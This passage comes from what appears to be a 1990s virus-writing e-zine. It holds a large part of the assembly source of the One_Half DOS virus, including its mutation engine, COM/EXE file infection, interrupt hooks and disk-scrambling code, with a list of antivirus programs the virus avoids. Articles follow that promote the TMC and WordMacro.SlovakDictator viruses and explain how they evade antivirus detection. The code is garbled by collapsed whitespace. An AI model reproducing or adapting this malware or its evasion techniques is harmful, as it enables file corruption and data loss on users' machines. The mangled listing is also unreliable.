add bx ,(( OFFSET bheader - OFFSET poss )- POCINS* 2)mov di , esadd di , 10hadd [ bx ] .vCS , diadd [ bx ] .vSS , di
cmp [ bx ] .items , 0je ssr4mov ds , es :[ 2ch ]xor si , si
lfn : inc sicmp word ptr [ si ], 0000hjne lfnadd si , 4xchg dx , simov ax , 3d00hint 21hjc errlppush cspop dsmov [ bx +( OFFSET handle1 - OFFSET bheader )], axmov dx ,[ bx ] .iaddrmov ax , 4200hcall Pmippush esxchg ax , di
ssr3 : push axlea dx ,[ bx +( OFFSET rbuff - OFFSET bheader )]mov cx ,[ bx ] .itemscmp cx ,(( OFFSET endvir - OFFSET rbuff )+ DLZBUFF)/ 4jb ssr1
ONE_HALF.ASM
mov cx ,(( OFFSET endvir - OFFSET rbuff )+ DLZBUFF)/ 4ssr1 : sub [ bx ] .items , cx
push cxshl cx , 1shl cx , 1mov ah, 3fhcall Pmipjc errlppop cxpop axxchg si , dx
ssr2 : add [ si +2], axles di ,[ si ]add es :[ di ], axadd si , 4loop ssr2cmp [ bx ] .items , 0ja ssr3 ;relocationpop esmov ah, 3ehcall Pmip
ssr4 : push espop dscmp cs :[ bx ] .flag , 0 ;is it COM ?jne sEXE
mov si , bxmov di , 100hmov cx , 3rep movsbpop axjmp short sCOM
sEXE: pop axclimov sp , cs :[ bx ] .vSPmov ss , cs :[ bx ] .vSSsti
sCOM: jmp dword ptr cs :[ bx ] .vIPerrlp : mov ah, 4ch ;if error on program loading
int 21h
rbuff LABEL byteRnd PROC NEAR
mov word ptr cs :( OFFSET povsi +1), sipush axpush bxpush cxpush dxDB 0b9h
rnd2 DW 0000hDB 0bbh
rnd1 DW ? ;<-MOV DX, 015AhMOV AX, 4E35hXCHG AX, SIXCHG AX, DXTEST AX, AXJZ r1MUL BX
r1 : JCXZ r2XCHG AX, CXMUL SIADD AX, CX
ONE_HALF.ASM
r2 : XCHG AX, SIMUL BXADD DX, SIINC AXADC DX, 0000hMOV cs : rnd1 , AXMOV cs : rnd2 , DXMOV ax , dx
pop cxxor dx , dxjcxz rdbz ;division by zerodiv cx
rdbz : pop cxpop bxpop axpop sipush sicmp byte ptr cs :[ si ], 0cchcli
neksl : je nekslsti
povsi : mov si , 1234hRET
Rnd ENDP
;*************** mutation ****************kod : DB 1kodpax : push ax
DB 1kodpcs : push cs
DB 1kodpds : pop ds
DB 3kodmsi : mov si , 1100h
DB 3kodmbx: mov bx , 1234h
DB 2kodxor LABEL neark01 : xor [ si ], bx
DB 4kodabx : add bx , 4567h
DB 1kodisi : inc si
DB 4kodcsi : cmp si , 1103h
DB 2jne k01
POCRI=9randi : nop
stcclcstiDB 2eh ;cs:DB 3eh ;ds:cldstdcmc
Rndi PROC nearor dx , dxjz rintd
ONE_HALF.ASM
push sipush cxpush dxmov cx , dx
rinxt : mov si , OFFSET randimov dx , POCRIcall Rndadd si , dxmovsbloop rinxtpop dxpop cxpop si
rintd : retRndi ENDP
Mtog PROC nearmov ax , dxinc dx ;for all ins. could be before instructioncall Rndsub ax , dxcall Rndixchg dx , ax ;random ins. before instruction
rep movsb ;instruction
cmp bx , OFFSET poss +2* 9 ;jump ?jne mtnjmov ax , poss [ 2* 5]sub ax , diadd ax , OFFSET ibufsub ax ,[ bx ] ;ax=poss[2*5]-di+OFFSET ibuf-[bx]dec distosb ;jump to marked instruction
mtnj : call Rndi ;random ins. after instructionret
Mtog ENDP
kodd DW OFFSETkodmbxDW OFFSETkodxor +1DW OFFSETkodabx +1 ;offset of instruction
kodi DW OFFSETkodmsiDW OFFSETkodxor +1DW OFFSETkodisiDW OFFSETkodcsi +1
Kodins PROC nearkinxt : lodsw
xchg di , axmov al , dlcmp si , OFFSET kodi +2* 2jnz kint ;conversion when addressingand al , 101bcmp al , 001bjnz kinsmov al , 111b
kint : cmp si , OFFSET kodd +2* 2jnz kins ;3 bit shiftmov cl , 3shl al , cl
ONE_HALF.ASM
or [ di ], alor al , 0c7hjmp short kiad
kins : or [ di ], alor al , 0f8h
kiad : and [ di ], al
cmp si , OFFSET kodijz kiendcmp si , OFFSET Kodinsjz kiendjmp kinxt
kiend : retKodins ENDP
MHeader PROC nearfics : mov si , OFFSET koddkom: mov dx , 1000b
call Rndcmp dl , 100b ;SPje kommov bl , dlcall Kodins ;encoding of data registersmov si , OFFSET kodi
kbxa : mov dx , 3call Rndadd dl , 110bcmp dl , 08hjne kvfmov dl , 011b ;BX
kvf : cmp dl , blje kbxacall Kodins ;encoding of address registers
xor cx , cxmov di , OFFSET poss
pnxt1 : cmp cx , 9 ;jump ?jne pnl
pom: mov dx , 200call Rndsub dx , 100add dx , poss [ 2* 5] ;return to 5. instructioncmp dx , 0jl pomcmp dx , DLZHDRjge pomjmp short pl
pnl : DB 0bahDLZHDR DW 1000 ;mov dx,DLZHDR
call Rndpl : jcxz pfirst
mov si , OFFSET posspush cx
pnxt : lodswsub ax , dxcmp ax , DLZINSjge pOKcmp ax ,- DLZINSjle pOKpop cx
ONE_HALF.ASM
jmp pnxt1pOK: loop pnxt
pop cxpfirst : xchg ax , dx
stoswinc cxcmp cx , POCINSjb pnxt1
;*******************************mov bx , OFFSET possmov si , OFFSET kod
mnxt : mov di , OFFSET ibuflodsbmov cl , al
mov dx , DLZINS- 3+1 ;'cos range is 0 - (DLZINS-1)sub dx , cx
mov ax ,[ bx +2] ;if one just after another - no jumpsub ax ,[ bx ]cmp ax , DLZINSjne mjininc dxinc dxcall Mtoginc bxinc bxjmp short mshort
mjin : call Rndcall Mtog
mov dx , disub dx , OFFSET ibuf - 3add dx ,[ bx ]mov al , 0e9hstosbinc bxinc bxmov ax ,[ bx ]sub ax , dx
cmp ax , 126jg mnearcmp ax ,- 129jl mnearinc axmov byte ptr [ di - 1], 0ebhstosb ;put short if possiblejmp short mshort
mnear : stosw
mshort : push bxpush cxDB 0b9h
vysr DW ? ;mov cx,vysrDB 0bah
nizr DW ? ;mov dx,nizradd dx ,[ bx - 2]adc cx , 0 ;CX:DX = position for instructionpush cxpush dx
ONE_HALF.ASM
call PozZacmov cx , DLZINSDB 0bah
vpior DW ? ;mov dx,vpioradd vpior , cxcall Citaniepop dxpop cxjc mhppcall PozZacxchg cx , dimov dx , OFFSET ibufsub cx , dxcall Zapis ;put generated instruction into file
mhpp: pop cxpop bxjc mhkon
cmp bx , OFFSET poss +2* POCINSjnb mhkonjmp mnxt
mhkon: retMHeader ENDP;********************* end of m. ****************;*************** copied routines **************zZakoduj PROC near
mov cx , DLZVIRxor dx , dx ;OFFSET stvircall zzp1mov ah, 40hmov bx , handlepushfDB 9ahDD ? ;call ds:oriv21jc zzk1cmp ax , cx
zzk1 : pushfcall zzp1popfret
zzp1 : push cxmov si , dx
zzkmax : mov ax , 0000hmov cx , DLZVIR
zzp2 : xor [ si ], axzzkaax : add ax , 0000h
inc siloop zzp2pop cxret
zZakoduj ENDP
zres24 : mov al , 03hiret
zInt13 PROC nearpushfcall cs : oriv13ret
zInt13 ENDPzTosi PROC near
push cx
ONE_HALF.ASM
push dxshr cl , 1shr cl , 1and dh, 11000000bor dh, clmov cl , 4shr dh, clmov dl , chxchg si , dxpop dxpop cxret
zTosi ENDPzSkramb PROC near
push axpush bxpush cxDB 0b0h ,? ;mov al,?DB 0bbh ,?,? ;mov bx,?
znxtss : mov cx , 256zls1 : xor word ptr es :[ bx ], 1212h
inc bxinc bxloop zls1dec aljnz znxtsspop cxpop bxpop axret
zSkramb ENDPzres13 : cmp ah, 02h
je zrtccmp ah, 03hje zrtcjmp zjtoo
zrtc : cmp dx , 0080hjne zencodetest cx , 0ffc0hjnz zencodepush bxpush dxpush sipush dipush cxpush cxmov si , axand si , 00ffhmov di , simov al , 01hpush axjz zbzch ;if AL=0 do nothingjcxz zgchicmp cl , 01hje zobbs
znxtsc : cmp cl , 17 ;if sector number > max. then errorja zgchi
zr13ds : cmp cl , 07hjb zctoocmp ah, 03hje zgchipush bx
ONE_HALF.ASM
mov cx , 512zflbf : mov byte ptr es :[ bx ], 00h
inc bxloop zflbfpop bx
zrtcom : add bx , 512pop axpop cxinc cxpush cxpush axdec sijnz znxtsc
zbzch : clczzav : pop ax
pushfxchg ax , disub ax , sipopfmov ah, chpop cxpop cxpop dipop sipop dxpop bxretf 2
zobbs : mov cl ,byte ptr cs :( OFFSET r13ds +2)zctoo : call zInt13
mov ch , ahjc zzavjmp zrtcom
zgchi : stcmov ch , 0bbh ;undefined errorjmp zzav
zencode : cmp dl , 80h ;encoding resp. decodingjne zjtoopush axpush cxpush dxpush sipush dspush cspop dsmov byte ptr kolzak , 0mov odkzak , bxcall zTosiand cl , 3fhand dh, 3fh
zchdnd : or al , aljz zhtvo
kontr : cmp si , 1234h ;max. cyl.jae zhtvocmp si , 1234h ;min. cyl.jb ztdalinc kolzakjmp short znxslp
ztdal : add odkzak , 512znxslp : dec al
inc clDB 80h , 0f9h
ONE_HALF.ASM
mxskt DB ? ;cmp cl,?jbe zchdndmov cl , 1inc dhDB 80h , 0feh
mxhlv DB ? ;cmp dh,?jbe zchdndxor dh, dhinc sijmp zchdnd
zhtvo : cmp kolzak , 0pop dspop sipop dxpop cxpop axje zjtoocmp ah, 02hje zeckncall zSkramb
zeckn : call zInt13pushfcall zSkrambpopfretf 2
zjtoo : DB 0eah;zoriv13 DD ?kzZak LABEL near;********************* EXE,COM modification ******* ****Subor PROC nearZapis : mov ah, 40h
jmp short s1Citanie : mov ah, 3fhs1 : call s2
jc s3cmp ax , cx
s3 : retZaciatok : xor cx , cx
mov dx , cxPozZac : mov ax , 4200h
jmp short s2Koniec : xor cx , cx
mov dx , cxPozKon: mov ax , 4202hs2 LABEL nearMhandle : mov bx , cs : handleInt21 : pushf
clicall cs : oriv21ret
Subor ENDP
Infikuj PROC nearmov bp, sp
mov ax , 5700hcall Mhandlemov bx , OFFSET ftimemov [ bx ], cxmov [ bx +2], dx ;read time and date of last writecall Identifyjc mikon0
ONE_HALF.ASM
mov dx , 30call Rnd ;with prob. 1:30 file won't be markedor dx , dxjz neoznmov [ bx ], ax ;mark
neozn : mov vpior , OFFSET orprg ;position in saving areamov dx , 0ffffhpush dxcall Rndmov word ptr ds :( OFFSET kodmbx+1), dxmov word ptr ds :( OFFSET zkmax+1), dxpop dxcall Rndmov word ptr ds :( OFFSET kodabx +2), dxmov word ptr ds :( OFFSET zkaax +1), dx ;values for encoding
call Zaciatokmov cx , 1ahmov dx , OFFSET headerpush dxcall Citaniejc mikon1xchg si , dxmov di , OFFSET bheaderrep movsbcall Koniecmov si , axmov di , dxpop bxcmp [ bx ] .id , 'MZ'je iEXEcmp [ bx ] .id , 'ZM'je iEXE
mov bheader.flag , 0 ;0 means COMcmp ax , 65535 -( DLZVIR+( VRCHOL- OFFSET endvir ))- 1 ;much too long dlhy ?cmcjc mikon1mov ax , 3 ;do not overwrite leading jumpcwdpush bxjmp short iCOM
iEXE : mov bheader.flag , 1mov ax ,[ bx ] .pagesmul v512sub ax , sisbb dx , di
mikon0 : jc mikon1 ;not wholemov ax ,[ bx ] .parpsmul v16push bxpush axpush dx
iCOM: sub si , axsbb di , dx
MINM=1000MAXM=3000
or di , dijnz short igt64mov dx , sisub dx , MINM
ONE_HALF.ASM
mikon1 : jb mikon2 ;not enough spacecmp dx ,( MAXM- MINM)jbe iltm
igt64 : mov dx ,( MAXM- MINM)iltm : call Rnd
add dx , MINMmov word ptr ds :( OFFSET kodmsi +1), dxadd dx , VRCHOL- 10h ;SS = CS+1cmp bheader.flag , 0je iCOM5mov header.vSP , dx ;set stack pointer
iCOM5: add dx , DLZVIR-(( VRCHOL- OFFSET stvir )- 10h )mov word ptr ds :( OFFSET kodcsi +2), dx ;header limitsadd dx , OFFSET stsub - DLZVIRmov posss , dx ;set jump after decodingadd dx ,(- DLZINS+1)-( OFFSET stsub - OFFSET stvir ) ;DX=Rnd+MINM-DLZINS+1mov DLZHDR, dxadd dx , DLZINS- 2not dxmov cx ,- 1call PozKon ;setting to the virus beginning in filemov vysr , dxmov nizr , axcmp bheader.flag , 0jne iEXE2xchg ax , dxadd dx , 100hjmp short iCOM1 ;if COM take from beginning
iEXE2 : pop dipop sisub ax , sisbb dx , di ;relatively in filediv v16
iCOM1: add word ptr ds :( OFFSET kodmsi +1), dxadd word ptr ds :( OFFSET kodcsi +2), dx ;set header limitspush axpush dxcall MHeader ;create header for decodingjnc twnm
mikon2 : jmp ikontwnm: pop dx
pop axmov cx , POCINSmov si , OFFSET poss
il1 : add [ si ], dxinc siinc siloop il1 ;set positions in posssub nizr , dxsbb vysr , 0 ;for correct positions on errorpop bxcmp bheader.flag , 0jne iEXE3
mov byte ptr [ bx ], 0e9hmov ax , poss [ 0* 2]sub ax , 3+100hmov word ptr [ bx +1], ax ;ins. jmp at the beginningmov bheader.items , 0mov bheader.min , 0mov bheader.vCS ,- 10hmov bheader.vIP , 100hjmp short iegh2
ONE_HALF.ASM
iEXE3 : mov [ bx ] .vCS , axinc axmov [ bx ] .vSS , axmov ax , poss [ 0* 2]mov [ bx ] .vIP , axadd [ bx ] .vSP , dx ;set SPand byte ptr [ bx ] .vSP , 0feh ;SP is evenmov [ bx ] .items , 0 ;no relocationsmov ax ,(( VRCHOL- OFFSET endvir )- 1)/ 16+1cmp [ bx ] .min , axjae iegh1mov [ bx ] .min , ax
iegh1 : cmp [ bx ] .max , axjae iegh2mov [ bx ] .max , ax ;set up min. and max. memory requirments
iegh2 : push bxcall Konieccall Zakoduj ;put v. to the file endjc ifailcall Koniecdiv v512inc axpop bxcmp bheader.flag , 0je iCOM4
iEXE1 : mov [ bx ] .pages , axmov [ bx ] .lpage , dx
iCOM4: push bxcall Zaciatokmov cx , 1ahpop dxcall Zapisjc ifail
stbkon : mov ax , 5701hmov cx , ftimemov dx , fdatecall Mhandle ;restore time and date
ikon : mov sp , bpret
ifail : mov dx , OFFSET orprgmov si , OFFSET poss
opdl : push dxlodswxchg dx , axmov cx , vysradd dx , nizradc cx , 0call PozZacpop dxmov cx , DLZINScall Zapisadd dx , cxcmp si , OFFSET posssjb opdl ;restore overwritten partsand ftime , 0ffe0h ;not markedjmp stbkon
Infikuj ENDP;************** routines for TSR part ****Nastav24 PROC near
ONE_HALF.ASM
push dxpush dspush cspop dsmov ax , 3524hcall Int21mov seg24 , esmov off24 , bxmov ax , 2524hmov dx , OFFSET res24call Int21pop dspop dxret
Nastav24 ENDPVrat24 PROC near
mov ax , 2524hlds dx ,dword ptr cs : off24call Int21ret
Vrat24 ENDP
POCKRP=6 ;number of critical programsretaz DB 4, '.COM' , 4, '.EXE'retaz1 DB 4, 'SCAN' , 5, 'CLEAN' , 8, 'FINDVIRU' , 5, 'GUARD' , 3, 'EMM'retaz2 DB 6, 'CHKDSK'
Over PROC nearpush dxpush bxpush cxpush sipush dipush dspush espush axmov si , dxmov di , OFFSET canamepush cspop eslea bx ,[ di - 1]mov cx , DLZFNB
ol1 : lodsbcmp al , 'a'jb nmpcmp al , 'z'ja nmpsub al , 'a' - 'A' ;uppercase
nmp: push axpush si
nzero : cmp al , ' 'jne nomdzlodsbor al , aljnz nzero ;no ending spacespop sipop sijmp short nstfn
nomdz: pop sipop axcmp al , '\'je stfn
ONE_HALF.ASM
cmp al , '/'je stfncmp al , ':'jne nstfn
stfn : mov bx , dinstfn : stosb
or al , aljz whnameloop ol1
whname: mov si , OFFSET retazsub di , 5push cspop ds
call Porovnajje porokcall Porovnajjne oinok ;is it COM or EXE ?
porok : pop axpush axxchg di , bxinc dicmp ax , 4b00hjne nnchkmov si , OFFSET retaz2call Porovnajjne nnchk ;is it CHKDSK ?mov byte ptr ds :( OFFSET dtrad +1), OFFSET dnxt - OFFSET con1
nnchk : mov cx , POCKRPmov si , OFFSET retaz1
ol2 : push cxcall Porovnajpop cxje oinokloop ol2 ;check for critical programs
mov si , OFFSET canamexor bl , bllodswcmp ah, ':'jne imdrvsub al , 'A' - 1mov bl , al
imdrv : mov ax , 4408hcall Int21or ax , ax
vsetky : jz oiok ;removable (floppy like)mov ax , 4409hcall Int21jc oinoktest dh, 10hjnz oiok ;in network
oinok : stcokon : pop ax
pop espop dspop dipop sipop cxpop bx
ONE_HALF.ASM
pop dxret
oiok : ; mov ax,0e07h; int 10h
clcjmp okon
Over ENDPPorovnaj PROC near
push dilodsbmov cl , almov ax , siadd ax , cxrepe cmpsbmov si , axpop diret
Porovnaj ENDP
Identify PROC near ;is file inf. ?push dxmov ax , es :[ bx +2]xor dx , dxdiv cs : v30mov ax , es :[ bx ]and al , 11111bcmp al , dlstcje iekon ;already infectedmov ax , es :[ bx ]and ax , 0ffe0hor al , dlclc
iekon : pop dxret
Identify ENDP
Subdlz PROC nearsub word ptr es :[ bx ], DLZVIRsbb word ptr es :[ bx +2], 0jnc npretadd word ptr es :[ bx ], DLZVIRadc word ptr es :[ bx +2], 0
npret : retSubdlz ENDP;************** TSR 21h part *************Infname PROC near ;DS:DX = file name
push axpush bxpush cxpush sipush dipush bppush dspush escall Nastav24mov ax , 4300hcall Int21mov cs : attrib , cxmov ax , 4301hxor cx , cxcall Int21
ONE_HALF.ASM
jc err1mov ax , 3d02hcall Int21jc err2push dxpush dspush cspop dspush cspop esmov handle , axcall Infikujmov ah, 3ehcall Mhandlepop dspop dx
err2 : mov ax , 4301hDB 0b9h
attrib DW ? ;mov cx,attribcall Int21
err1 : call Vrat24pop espop dspop bppop dipop sipop cxpop bxpop axret
Infname ENDP
res21 : pushfsticmp ah, 11hje dtradcmp ah, 12hjne dnxt
dtrad : jmp short con1 ;switched jump conditioncon1 : push bx
push espush axmov ah, 2fhcall Int21pop axcall Int21cmp al , 0ffhje dterrpush axcmp byte ptr es :[ bx ], 0ffhjne nrozsadd bx , 7
nrozs : add bx , 17hcall Identifypop axjnc dterradd bx , 1dh - 17hcall Subdlz
dterr : pop espop bxpopfiret
ONE_HALF.ASM
dnxt : cmp ah, 4ehje drozscmp ah, 4fhjne ndnxt
drozs : push bxpush espush axmov ah, 2fhcall Int21pop axcall Int21jc drozepush axadd bx , 16hcall Identifypop axjnc drozneadd bx , 1ah - 16hcall Subdlz
drozne : pop espop bxpopfclcretf 2
droze : pop espop bxpopfstcretf 2
ndnxt : cmp ax , 4b53hjne obrnxtmov ax , 454bhpopfiret
obrnxt : cmp ah, 4chjne nkprgmov byte ptr cs :( OFFSET dtrad +1), 0
nkprg : cldpush dxcmp ax , 4b00h
jne nsppgcon3 : jmp short miimmiim : push ax
push bxpush dspush esmov ah, 52hcall Int21mov ax , es :[ bx - 02h ]
nmcb: mov ds , axadd ax , ds : 03hinc axcmp byte ptr ds : 00h , 'Z'jne nmcbmov bx , cscmp ax , bxjne cpchmov byte ptr ds : 00h , 'M'xor ax , axmov ds , axadd word ptr ds : 0413h , POCKIL ;memory look improvement
cpch : mov byte ptr cs :( OFFSET con3 +1), OFFSET aiim - OFFSET miim
ONE_HALF.ASM
pop espop dspop bxpop ax
aiim : jmp short infacnsppg : cmp ah, 3dh
je infac; cmp ah,43h; je infac
cmp ah, 56hje infaccmp ax , 6c00hjne nxtstest dl , 00010010bmov dx , sijz infacjmp short saveh
nxts : cmp ah, 3chje savehcmp ah, 5bhje savehcmp ah, 3ehjne jor21cmp bx , cs : chandlejne jor21or bx , bxjz jor21call Int21jc miretspush dspush cspop dsmov dx , OFFSET fnamecall Infnamemov chandle , 0pop ds
miretc : pop dxpopfclcretf 2
jor21 : pop dxpopfjmp cs : oriv21
infac : call Overjc jor21call Infnamejmp short jor21
saveh : cmp cs : chandle , 0jne jor21call Overjc jor21mov cs : rhdx , dxpop dxpush dxcall Int21db 0bah
rhdx DW ? ;mov dx,rhdxjnc shok
mirets : pop dxpopf
ONE_HALF.ASM
stcretf 2
shok : push cxpush sipush dipush esxchg si , dxmov di , OFFSET chandlepush cspop esstoswmov cx , DLZFNBrep movsbpop espop dipop sipop cxjmp short miretc
DB 'DidYouLeaveTheRoom?'order DW 1230 ;very important year :)endvir LABEL near
Zakoduj PROC nearmov cx , DLZVIRxor dx , dx ;OFFSET stvircall zp1mov ah, 40hmov bx , handlepushfDB 9ah ;call oriv21
oriv21 DD ?jc zk1cmp ax , cx
zk1 : pushfcall zp1popfret
zp1 : push cxmov si , dx
zkmax: mov ax , 0000hmov cx , DLZVIR
zp2 : xor [ si ], axzkaax : add ax , 0000h
inc siloop zp2pop cxret
Zakoduj ENDP
res24 : mov al , 03hiret
Int13 PROC nearpushfcall cs : oriv13ret
Int13 ENDPTosi PROC near
push cxpush dxshr cl , 1
ONE_HALF.ASM
shr cl , 1and dh, 11000000bor dh, clmov cl , 4shr dh, clmov dl , chxchg si , dxpop dxpop cxret
Tosi ENDPSkramb PROC near
push axpush bxpush cxDB 0b0h ;mov al,kolzak
kolzak DB ?DB 0b8h ;mov bx,odkzak
odkzak DW ?nxtss : mov cx , 256ls1 : xor word ptr es :[ bx ], 1212h
inc bxinc bxloop ls1dec aljnz nxtsspop cxpop bxpop axret
Skramb ENDPres13 : cmp ah, 02h
je rtccmp ah, 03hje rtcjmp jtoo
rtc : cmp dx , 0080hjne encodetest cx , 0ffc0hjnz encodepush bxpush dxpush sipush dipush cxpush cxmov si , axand si , 00ffhmov di , simov al , 01hpush axjz bzch ;if AL=0 do nothingjcxz gchicmp cl , 01hje obbs
nxtsc : cmp cl , 17 ;if sector number > max. then errorja gchi
r13ds : cmp cl , 07hjb ctoocmp ah, 03hje gchipush bx
ONE_HALF.ASM
mov cx , 512flbf : mov byte ptr es :[ bx ], 00h
inc bxloop flbfpop bx
rtcom : add bx , 512pop axpop cxinc cxpush cxpush axdec sijnz nxtsc
bzch : clczav : pop ax
pushfxchg ax , disub ax , sipopfmov ah, chpop cxpop cxpop dipop sipop dxpop bxretf 2
obbs : mov cl ,byte ptr cs :( OFFSET r13ds +2)ctoo : call Int13
mov ch , ahjc zavjmp rtcom
gchi : stcmov ch , 0bbh ;undefined errorjmp zav
encode : cmp dl , 80h ;encoding resp. decodingjne jtoopush axpush cxpush dxpush sipush dspush cspop dsmov kolzak , 0mov odkzak , bxcall Tosiand cl , 3fhand dh, 3fh
chdnd : or al , aljz htvocmp si , 1234h ;max. cyl.jae htvo
cnflte : cmp si , 1234h ;min. cyl.jb tdalinc kolzakjmp short nxslp
tdal : add odkzak , 512nxslp : dec al
inc clDB 80h , 0f9h ,?
ONE_HALF.ASM
jbe chdndmov cl , 1inc dhDB 80h , 0feh ,?jbe chdndxor dh, dhinc sijmp chdnd
htvo : cmp kolzak , 0pop dspop sipop dxpop cxpop axje jtoocmp ah, 02hje eckncall Skramb
eckn : call zInt13pushfcall Skrambpopfretf 2
jtoo : DB 0eahoriv13 DD ?
handle DW ?header strc <>off24 DW ?seg24 DW ?ftime DW ?fdate DW ?chandle DW ?fname DB DLZFNB DUP(?)ibuf LABEL byte ;variables for mutationcaname DB DLZFNB DUP( 1)
endres LABEL nearVkod ENDS
END start
Since some 4 or 5 months it was known, that there has been released some new kind ofvirus. First rumorz talked 'bout virus, that srews all the heuristic. And, we've to say, it waspure fact, no advertising shit.
>From technical point of view, TMC is resident com'n'exe infector. The infection occurs onexecution, opening, renaming and copying of suitable files. This 'll affect com's under 57 kBand exe's under 384 kB. The infection of file, which filename starts with 'ic', 'no', 'we', 'tb', 'av','sc', 'co', 'wi' and 'kr' is not possible. These strings covers huge spectrum of anti - viruses.Selected strings covers not only the best Slovak antivirus pragram NOD - ICE, but also othergood AV tools. So, TMC has a quit good chance to survive most important first months in thewild. TMC sets second in timestamp to 'magic' value 8. Virus contains texts:
TMC 1.0 by Ender from SlovakiaWelcome to the Tiny Mutation Compiler!Dis is level 42.Greetings to virus makers: Dark Avenger, Vyvojar, Hell AngelPersonal greetings: K. K., Dark Punisher
And you may now ask : " And what makes TMC so extraordinary ?" Okay, let's go to the voidmain().
#define FALSE 0#define TRUE 1#define NOT_TRIVIAL 0.5#define INFECTED_FILE_CONTAIN_BODY_OF VIRUS FALSE
/* Body of the virus cointains just some kind of compiler, which from from excrypted sourcepseudocode copiles virus to the memory. Because the compilation does't use any structure,which are heurictic sensitive, there is no heuristic alert here :) [ Simple and clever ] The copileris also capable to insert garbage jump instruction in the virus copy in memory.So again, nosiple scanstring in memory here. Just one little thingy is here not perfect. These jump 'll nothave known size, so the compiler puts here some extra NOPs. The virus is the like asmproggy compiled umnder TASM without /m switch. */
.
#define ANTIHEURISTIC_CODE TRUE
/* TMC contains some kind of anti cleaning trap. So it is not easy to remove from infected file.Well, another life insurance */
#define EXTRA_STUFF TRUE
/* TMC has in diffrerent generations different features. Just check it out */
#define DETECTION_AND_REMOVAL NOT_TRIVIAL
/* As far as i know, only two antivirus programs detect TMC - Dr.Web and NOD-ICE. As extrabonus, NOD is capable to remove TMC. Some dudes from AV side seems to be really goodin their work :( */
Ender, the perspective author of this virus, has choosen his nick from the 'Enders game' byOrson Scott Card. Strings "Welcome to the Tiny Mutation Compiler!" and "Diz is level 42" areaccording the author related to Level3 by Vyvojar.
Due some kind of agreement between our mag and Ender, we were not allowed to publishthe full sources of this excelent virus. As Ender stated, the sources 'll be released only afterall the major anti-virus vendors 'll detect and remove the virus. "They should have their workhard... they 're payed for it, but we are not ...". So dear friend, we present you at least sampleof this virus. But we have source prepared for public release asap TMC 'll be removed byTBAV,SCAN,AVP,DRWEB,S&S,ALWIL! and other from Virus Bulletin.
Howgh !
Download here
WordMacro.SlovakDictator
The first world true polymorphic macro virus infecting Word 7.x documents.The virus ofthe next generation.
This decription brought to you by Nasty Lamer & Ugly LuserExclusively for the *-zine. (c) 1-mar-1997, Slovakia
In this article will be described, how this macro virus works, what are its advantages incomparison with other existing Word 6.0, 7.0 macro viruses, its disadvantages and finally theplans of authors of this virus for the near future will be mentioned. Source code (2ndgeneration) is shown at the end of this article. The macro generator (Lamer's Macro Engine)itself is not presented intentionally.
IntroductionMacro viruses for Word 6.0 and above infects Micro$oft Word documents and templates. Thefirst macro virus for Word was written in fall of 1994. In the present there are over 500 knownmacro viruses and their number grows rapidly every day. But many of them are very similareach to other and do not offer anything new to the virus writing technology. They use almostthe same infection techniques and their bodies are the same in each copy of the virus. Manyof them are very lame and primitive. Authors of macro viruses very often use whole parts fromother macro viruses in their macro, modify them a little bit and release them as new viruses.But almost all known macro viruses have for each copy the same binary image of the macrobody (so-called static macros). This feature very simplifies the work of antivirus companies.They can detect these macros very exactly with high accuracy by using CRC method. Theyare able to add detection for several hundreds macro viruses a days by using programs for anautomatic generation of the CRC for the macro bodies. Current macro virus writers are nottoo inventive and it looks like that only lamers write macro viruses. Do not forget, that macrovirus writing is not for real virus writers as they prefer writing in assembler.The first break through in macro virus writing technology has caused the Outlaw virus. It wasthe first semi-polymorphic virus. Why semi-polymorphic ? Because only the macro nameswere different in the each copy of the virus but its body has remained still static (someantiviruses used to detect the viruses by their names). However for peoples interesting in theantivirus industry it was a nice opportunity to flood various magazines with detaileddescription of this "new technology" in macro virus writing.After a long time the macro virus writers have detected that Micro$oft Word Basic gives apossibility for macro editing and creating polymorphic macro viruses. In the present these
possibilities are not used very often. There exists only few viruses which modify something intheir source code and make the each generation a little bit different. Their most often usedmethod is simply in inserting one or several dummy lines to the source code or changingnames for some variable. The true polymorphic viruses was not known untilWordMacro.SlovakDictator appears.
Behind the macro viruses detection techniquesThe antivirus programs uses different techniques to detect macro viruses. >From the point ofview of used techniques, we can arrange them into the following categories:1. The method based on looking for "virus strings"
Because a big part of the macros includes texts, strings must be enough long to avoidpossible false alarms. The frequently used and also reasonable size for these strings isbetween 24 and 32 bytes. The advantage of this method is in the fact that by using onesearch string it can detect several variants of the big family of viruses. In the most casesthis method can not detect viruses exactly.
2. Method based on computing CRC'sThis is the only method which is able to detect all static macro viruses exactly. The bigdisadvantage of using this method is that it fails in those cases, that someone adds forexample the tabulator mark after the end of macro :). In the present most of theantivirus programs use this method.
3. Method based on heuristic analyzing of the macrosThis is good a method for detecting new and even unknown macro viruses.
4. Other methodsThey use a combination of several methods mentioned above or some new techniques.
Description of the WordMacro.SlovakDictator macro virusThis virus is the first real attempt how to write an macro virus undetectable by "searchstrings". It also fucks all scanner based on computing CRC, because it has almost unlimitedmutation capability. We decided to write this virus to to illustrate some techniques, whichoffers MacroFuck Corporation and their Macro$Soft Word for macro viruses writers.The virus contains only one unencrypted viral macro AutoClose and its size is from 14 kB to16 kB (the size for variant B may overreach 16 kB). All names of variables, procedures,functions and constants are fully mutated and for this reason the final size of the macro isdifferent for each copy of the virus.The macro does not use any command for copying macros (MacroCopy or Organizer) forreplicating. It uses simply only commands for creating and editing macros. Due to this featureit is not detectable by know virus scanners yet, even not by the heuristic scanners. Thedetection of this virus will probably cause problems to antivirus programs which use "searchstrings" for macro detecting. The whole macro is divided into three parts. In the first part are declared all global variables,arrays and constants. In the second part is performed a check for the version of Word and itcontains all procedures and functions needed for creating macro and its execution. The thirdand the final part contains two tables. In the first table is stored the whole macro body (its
source lines) in an encrypted form. The source lines in this table does not contain two tablesmentioned above because they are already present in the third part of the macro.
The actions of the macro virus is performed in several steps:
1. It checks whether of the Micro$oft Word in use is 7.x. If yes, the further steps areperformed, otherwise the macro will finish.
2. It decrypts the first table in the third part of the macro. The choosen encryption method isvery trivial. Each byte is decrypted with a constant which may have values from 4 to 13 (try toguess why ?). This value is added (or subtracted) to the each character in the strings thatbelong to the first table in the third part of the macro.
3. It creates temporary macro with a random name and inserts decrypted source lines of themacro (the first two parts of the macro) to it.
4. It replaces all occurrences of the string "@@" with """. The characters @@ are used tomark all places that have to be replaced with a quote.
5. It inserts both tables at the end of this macro - the table with decrypted source lines and thetable with polymorphic names of variables, procedures, functions and constants.
6. It calls procedure which will mutate all names stored in table with polymorphic names.These names are from 10 to 19 characters long.
